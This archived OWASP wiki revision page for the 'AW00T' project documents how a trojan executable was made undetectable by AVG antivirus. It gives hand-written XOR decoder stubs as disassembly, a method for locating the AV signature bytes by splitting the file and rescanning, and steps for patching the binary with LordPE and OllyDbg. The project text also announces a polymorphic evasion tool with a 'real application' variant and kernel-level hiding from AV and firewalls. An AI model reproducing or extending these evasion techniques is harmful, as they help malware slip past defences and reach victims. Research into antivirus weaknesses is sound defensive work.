This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "OWASP AW00T"

From OWASP
Jump to: navigation, search
Line 105: Line 105:
 
</table>
 
</table>
  
 +
<table border="0" cellspacing="0" cellpadding="0" bgcolor="#EBFFE9">
 +
  <tr>
 +
    <td width="624" valign="top"><p>004018E4        &gt;    \B8 25304000          MOV EAX,Trojan2.00403025<br />
 +
      004018E9        .  8030 0F           XOR BYTE PTR DS:[EAX],0F<br />
 +
      004018EC       .  B8 00000000               MOV EAX,0<br />
 +
      004018F1        .  55                    PUSH EBP<br />
 +
      004018F2        .  8BEC              MOV EBP,ESP<br />
 +
      004018F4        .  83EC 08         SUB ESP,8<br />
 +
      004018F7        .  C70424 01000000  MOV DWORD PTR SS:[ESP],1<br />
 +
      004018FE       .^ E9    2AF9FFFF         JMP Trojan2.0040122D</p></td>
 +
  </tr>
 +
</table>
 +
 +
And made the olly to copy the changes to an executable and then save the file. The final result was as shown .
 +
 +
[[File:stub4.png]]
 +
[[File:stub5.png]]
  
 
=Project About=
 
=Project About=

Revision as of 13:36, 20 December 2012

Media:Bypassingantivirus.docx=Main= The Project is under development .

WHITE2.jpg

DARK.jpg
Initially the project was focused in displaying raw code and methodologies used in bypassing AV but the project is now going up a new level.
I have decided to develop a functional program that will bypass antivirus on the go with advanced polymorphic and Human like intelligence techniques.

Just for starters Demonstration. This is something that i did in 2008 so you can have a look how it starts!

1. Bypassing Antivirus a. Objective


The objective of this exercise was to make the trojan.exe undetectable from the AVG antivirus and we were free to use any stub and the original functionality of the file must be regained.


b. Case one implementation --------> (Failure)

Case one (Failure) Stub1.jpg
Result Failure AVG detected both file Case one was based on the assumption that the signature is available on the .text section of our file but as soon i implemented it the AVG detected the file provided with the XOR stub as well.

The .text section of the program was encoded. We used Lord PE to make the text section writable.

Encode from here to here 00401225 90 NOP

To 004018DF. Initial instructions were:-

</tr>

 

00401220 T> $  55               PUSH EBP
00401221      .  89E5            MOV EBP,ESP
00401223      .  83EC 08                 SUB ESP,8
00401226      .  C70424 01000000  MOV DWORD PTR SS:[ESP],1
0040122D     .  FF15 CC504000   CALL DWORD PTR DS:[<&msvcrt.__set_app_>;  msvcrt.__set_app_type
00401233      .  E8 C8FEFFFF       CALL Trojan.00401100

I used a XOR stub looks like this:-

004018D8     > \B8 25124000        MOV EAX,Trojanch.00401225

     004018DD     >     8030 0F                 XOR BYTE PTR DS:[EAX],0F
004018E0      .  40                 INC EAX                                ;  Trojanch.004018D5
004018E1      .  3D D4184000        CMP EAX,Trojanch.004018D4
004018E6      .^ 7E F5          JLE SHORT Trojanch.004018DD
004018E8      .  55                 PUSH EBP
004018E9      .  8BEC         MOV EBP,ESP
004018EB     .  83EC 08                 SUB ESP,8
004018EE     .^ E9 33F9FFFF       JMP Trojanch.00401226
004018F3      00                    DB 00

The original functionality was regained but AVG was still detecting the malicious file. So a secondary approach was required as shown in case two.


d. Hunting Antivirus Signature c. Case Two (Success)

Since the case one was based on our assumption that the Antivirus signature is based in the .text section of our file and thus we failed.

So our second approach was to dig out the signature or use the stub on all other sections as well but the latter idea does not sound so good as we have to deal with a lot of cases and program details in that case so we will be now hunting for the signature that the poor AVG antivirus is using.

Our approach will be as follows:-

Stub2.png

We however are not concerned with the complete signature or the length and address it is associated with what we need is a single byte change in the signature of the file and making it undetectable from the antivirus. We used the hexedit to cut the file and then scanning it with the AVG Antivirus to check the respective files and check up to the minimal point up to which it detects and thus we can easily extract the signature from it. The signature was present in the .rdata section of the file. In hexedit if you see it starts from 1000 address or search it From hex string

6a eb 4d e8 F9 --------------------To ------------------ 6a 02 ff d0 68 d9 09 f5

This is the signature that the AVG is detecting in the program. What we noticed is an instruction xor eax,eax which can easily be replaced with the mov eax,0 and on its implementation the bytes around the signature will be changed and the file will be undetectable from the AVG but the problem with this solution is that we have to add some extra bytes because of the different instruction size of these instructions the latter being larger Rather than using the above approach i used a simple method as mentioned in case one the XOR stub and used it on the address of the 31 05 (xor eax,eax) .We could have used any simple stub like just add a byte to it or subtract from it but we have to again save the file by editing and adding the opposite instruction like if we use add than after changed instruction change it to subtraction and vice versa to obtain the original file in run time. So we are using a XOR stub on the 31 05(xor eax,eax) instruction .

Implementation stub

Stub3.png

As clearly shown in diagram above the XORed byte 3E was regained when the program is run as XORing it again makes it 31 again and the original instruction 31 C0 is regained. We need to make the .rdata section writable with LORD PE first but for safety sake i made all the first four sections writable.

Firstly the initial instructions were copied and a jump to 004018e4 is done.

00401220 T> $  55               PUSH EBP

     00401221      .     89E5            MOV EBP,ESP
00401223      .  83EC 08                 SUB ESP,8
00401226      .  C70424 01000000  MOV DWORD PTR SS:[ESP],1
0040122D     .  FF15 CC504000   CALL DWORD PTR DS:[<&msvcrt.__set_app_>;  msvcrt.__set_app_type
00401233      .  E8 C8FEFFFF       CALL Trojan.00401100

004018E4        > \B8 25304000          MOV EAX,Trojan2.00403025

     004018E9        .  8030 0F           XOR BYTE PTR DS:[EAX],0F
004018EC       .  B8 00000000            MOV EAX,0
004018F1        .  55                 PUSH EBP
004018F2        .  8BEC           MOV EBP,ESP
004018F4        .  83EC 08      SUB ESP,8
004018F7        .  C70424 01000000  MOV DWORD PTR SS:[ESP],1
004018FE       .^ E9 2AF9FFFF         JMP Trojan2.0040122D

And made the olly to copy the changes to an executable and then save the file. The final result was as shown .

Stub4.png Stub5.png

Project About

PROJECT INFO
What does this OWASP project offer you?
RELEASE(S) INFO
What releases are available for this project?
what is this project?
Name: OWASP AW00T (home page)
Purpose: Its an implementation of binary stubs from basic to the polymorphic code that will show how viruses and malicious files get themselves undetected from the Antiviruses.

The generated stubs can be appended to any program and also a new approach of AV avoidance will be shown also special programs for hunting down the signatures and extracting them, and editing them for better use will be incorporated.

<b>The new approach now will show that any virus/malware being fetched to the program in encrypted format will be safely tested
with the installed AV or any other program catching malicious files which will in short fuzz the AV for typical scenarios and weak spots.
If the program fails to somehow attack the target AV it will then try to break up the file and look for exact part of code that is embedded in AV as signature and will then work on our second strategy of avoiding its bypass There will be two variants of program one for just experimentation and other one for real application in testing a machines security </b>

  • The second one named also named as AW00T but will be written in black words and the earlier variant will be written in white.
  • We will use a cloud based environment to check for possible kernel level exploits as after that we can get our programs running underneath the Application level and making it highly impossible for AV and Firewalls to monitor the data. The cloud will be used to share code and determine most probable attacks within less time and collecting attack scenarios and real time and generating our custom signatures and classifying them accordingly this will help us in keeping our program size as low as possible.
  • Antivirus nowadays comes with that protection too i also have a solution for that and will be discussed in our documented regarding the functional in our wiki page. Please check it soon
  • The next important thing comes for protecting our code when it is scanned by the AV in the memory itself while in execution
License: GNU GPL v2
who is working on this project?
Project Leader(s):
  • Nitin Arya @
how can you learn more?
Project Pamphlet: Not Yet Created
Project Presentation:
Mailing list: Mailing List Archives
Project Roadmap: View
Key Contacts
  • Contact Nitin Arya @ to contribute to this project
  • Contact Nitin Arya @ to review or sponsor this project
current release
Not Yet Published
last reviewed release
Not Yet Reviewed


other releases